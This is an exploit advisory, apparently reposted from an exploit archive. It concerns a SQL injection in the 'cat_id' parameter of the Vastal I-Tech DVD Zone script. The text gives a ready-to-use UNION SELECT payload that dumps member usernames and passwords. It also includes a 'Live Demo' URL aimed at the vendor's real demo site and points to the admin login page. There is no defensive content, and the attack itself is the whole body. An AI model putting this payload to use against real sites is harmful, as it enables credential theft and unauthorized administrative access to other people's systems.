id: 3606
date: 09/04/2008
title: Vastal I-Tech DVD Zone (cat_id) SQL Injection Vulnerability
author: DeViL iRaQ
cves: 

===========================================================
Vastal I-Tech DVD Zone (cat_id) SQL Injection Vulnerability
===========================================================



#######################################################
# Vastal I-Tech DVD Zone ( cat_id ) SQL Injection Vulnerability
#
# Author   : DeViL iRaQ
#
# Price     : $399.99 (:
#
# Script Home Page : hhttp://www.vastal.com/dvd-zone-dvd-rental-script.html
#
# Demo      : http://dvdzone.vastal.com/
#
# Dork      : N/A
########################################################
# Exploit :
# www.[sitename].com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
#
# Live Demo:
# http://dvdzone.vastal.com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################



#  0day.today [2023-03-22]  #